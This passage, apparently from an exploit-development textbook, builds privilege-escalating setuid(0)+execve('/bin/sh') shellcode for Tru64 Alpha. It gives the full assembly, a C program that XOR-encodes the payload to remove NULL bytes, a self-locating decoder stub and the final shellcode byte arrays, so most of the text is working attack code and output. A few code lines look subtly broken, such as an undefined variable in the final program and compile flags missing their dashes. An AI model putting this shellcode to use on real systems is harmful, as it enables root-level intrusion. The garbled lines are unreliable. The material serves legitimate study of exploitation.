| ||
Assembling working shellcode by using the XOR decoder takes several steps. In this section, we will present a bare-bones setuid(0) + execve ("/bin/sh", ...) shellcode written in assembly, and then glue it into the XOR decoder described previously. We will present a couple of C programs and shell scripts that will make our development process faster and more efficient. After writing the shellcode we will assemble and link it into a final executable. This executable is the simple initial shellcode, without the XOR decoder and the GetPC self-locating code. We will first extract the main portion of the executable (the shellcode), use a C program to go over the opcode bytes, and XOR them with the XOR key, thus generating the encoded shellcode. Secondly, we will plug the encode shellcode into GetPC and XOR decoder routine. This will result in our final, encoded, self-locating, and self-decoding shellcode. Let's walk through of the steps and develop the code.
Here we have the code for the setuid(0) and execve(/bin/sh) system calls (the code is fairly self-explanatory).
#include <alpha/regdef.h> #include <alpha/pal.h> .text .arch generic .align 4 .globl main .ent main main: .frame $sp, 0, #always assume that current location is in a0 #it is the responsibility of the decoder to pass #the current Program Counter to us. bic sp, 0xf, sp #make sure tha stack is 16 byte aligned. addq a0, 0x30, s4 #address of //bin/sh stq s4, (sp) #store address of //bin/sh stq zero, 8(sp) #store the NULL terminator. bis zero, zero, a0 #uid=0, first argument. addq zero, 0x17, v0 #setuid syscall. PAL_callsys #trap to kernel. mov s4, a0 #address of //bin/sh mov sp, a1 #address that points to (address of //bin/sh). bis zero, zero, a2 #NULL. addq zero, 0x3b, v0 #execve syscall PAL_callsys #trap to kernel. .quad 0x68732f6e69622f2f #/bin/sh\x00 .long 0x00000000 .end main
Compiling is pretty straightforward; use this command:
cc O0 o setuid_exec setuid_exec.s
Extraction can be a little tricky, but we find an easy solution by using the dis (disassemble) command that comes default with the Tru64 OS. Put the following lines into a shell script, which we named dump.sh :
cat >> dump.sh << _EOF_ dis -p main awk {' print "0x"","'} _EOF_
With the help of dis and awk commands, we will extract the main function (which we assembled by hand in the first step) as an array of longs. Here is what it looks like:
chmod 755 dump.sh ./dump.sh ./setuid_exec [ignore the empty lines with only one comma] , 0x47c1f11e, 0x4206140d, 0xb5be0000, 0x43e2f400, 0xb7fe0008, 0x47ff0410, 0x00000083, 0x47de0411, 0x45ad0410, 0x47ff0412, 0x43e77400, 0x00000083, 0x69622f2f, 0x68732f6e, 0x00000000,
You can achieve this step easily with simple C code (or python, perl, or whatever you wish). We will place the extracted opcodes into an integer array, and iterate through it, and XOR each value with the XOR key. Finalize the process by dumping an XOR encoded payload ready to be glued into the XOR decoder and the GetPC code.
unsigned int shellcode[] = { 0x47c1f11e, 0x4206140d, 0xb5be0000, 0x43e2f400, 0xb7fe0008, 0x47ff0410, 0x00000083, 0x47de0411, 0x45ad0410, 0x47ff0412, 0x43e77400, 0x00000083, 0x69622f2f, 0x68732f6e, 0x00000000 }; int main() { int i; //printf("sizeof shellcode %d\n", sizeof(shellcode)); for(i =0 ; i < sizeof(shellcode)/4; i++) printf(".long\t0x%.8x\n", shellcode[i] ^= 0x88888888); }
The output will be plugged back into an assembly program. Here is how the setuid+execve code will look with 0x88888888 as the XOR key.
.long 0xcf497996 .long 0xca8e9c85 .long 0x3d368888 .long 0xcb6a7c88 .long 0x3f768880 .long 0xcf778c98 .long 0x8888880b .long 0xcf568c99 .long 0xcd258c98 .long 0xcf778c9a .long 0xcb6ffc88 .long 0x8888880b .long 0xe1eaa7a7 .long 0xe0fba7e6 .long 0x88888888
Note | Notice we have no NULL bytes. |
We will now put the decoder and the encoded payload together and glue them together by changing some configurable values in the XOR decoder.
#include <alpha/regdef.h> #include <alpha/pal.h> .text .arch generic .align 4 .globl main .ent main main: .frame $sp, 0, lda a0, -1000(sp) #GetPC code we have just covered. back: bis zero, 0x86, a1 #a1 equals to 0x00000086 which is the imb #instruction that syncs the instruction cache thus #make it coherent with main memory. #1st run: store imb instruction in sp - 1000 stack. stl a1, -4(a0) #2nd run: overwrite the following bsr instruction #with imb. addq a0, 48, a2 stl a1, -4(a2) #also overwrite the 0x41414141 with the imb #instruction thus avoiding i-cache incoherency #after the decode process since imb instruction #also have NULL bytes this is the only way to avoid #NULL bytes in decoder loop. bsr a0, back #branch the label back saving pc in a0 register. #on the second run bsr will be overwritten. #execution will continue with the next instruction. addq a0, 52, a4 #offset to xored data plus four. addq zero, 60, a3 #size of xored data in bytes. #Changed according to the size of the setuid+execve payload addq a0, 112, a5 #offset to xor key; equals to xordata size plus 52. addq a0, 48, a0 #a0 should point to the first instruction of the #xored data. ldl a1, -4(a5) #load the xor key. xorloop: ldl a2, -4(a4) #load a single long from the xored data. xor a2, a1, a2 #xor/decrypt the long. stl a2, -4(a4) #store the long back into its location. subq a3, 4, a3 #decrement counter. addq a4, 4, a4 #increment xored data pointer, move to next long. bne a3, xorloop #branch back to xorloop till counter is zero. .long 0x41414141 #this long will be overwriten with the imb #instruction. flush I-cache. .long 0xcf497996 .long 0xca8e9c85 .long 0x3d368888 .long 0xcb6a7c88 .long 0x3f768880 .long 0xcf778c98 .long 0x8888880b .long 0xcf568c99 .long 0xcd258c98 .long 0xcf778c9a .long 0xcb6ffc88 .long 0x8888880b .long 0xe1eaa7a7 .long 0xe0fba7e6 .long 0x88888888 .long 0x88888888 #XOR key. .end main
As the final step, we should compile the assembly code in and extract the main function's opcodes to reach our final shellcode.
cc O0 o final_setuid_exec final_setuid_exec.s ./dump.sh final_setuid_exec , 0x221efc18, 0x42061412, 0x47f0d411, 0xb230fffc, ...
Once again, our shell script will print out an array of integers, which will be our final shellcode. We can make better-looking output (C char-style array) by using the following basic C code.
unsigned int shellcode[] = { 0x221efc18, 0x42061412, 0x47f0d411, 0xb230fffc, 0xb232fffc, 0xd21ffffb, 0x420e1415, 0x42069414, 0x43e79413, 0xa235fffc, 0x42061410, 0xa254fffc, 0x42609533, 0x46510812, 0xb254fffc, 0x42809414, 0xf67ffffa, 0x41414141, 0xcf497996, 0xca8e9c85, 0x3d368888, 0xcb6a7c88, 0x3f768880, 0xcf778c98, 0x8888880b, 0xcf568c99, 0xcd258c98, 0xcf778c9a, 0xcb6ffc88, 0x8888880b, 0xe1eaa7a7, 0xe0fba7e6, 0x88888888, 0x88888888 }; int main() { unsigned char buf[sizeof(shellcode)+1]; int i; printf("sizeof shellcode %d\n", sizeof(xor_connbacksc)); memcpy(buf, shellcode, sizeof(shellcode)); for(i =0 ; i < sizeof(shellcode); i++) { if(!((i) % 4)) printf("\"\n\""); printf("\x%.2x", buf[i]); } printf("\n"); }
Output of this simple C code will be the familiar exploit character array.
"\x18\xfc\x1e\x22" "\x12\x14\x06\x42" "\x11\xd4\xf0\x47" "\xfc\xff\x30\xb2" "\xfc\xff\x32\xb2" ...
Now, let's move onto more advanced concepts and build several new shellcodes. From now on, only initial assembly shellcode and the final C code will be presented. All the intermediate developments steps mentioned above will be left out to save space.
| ||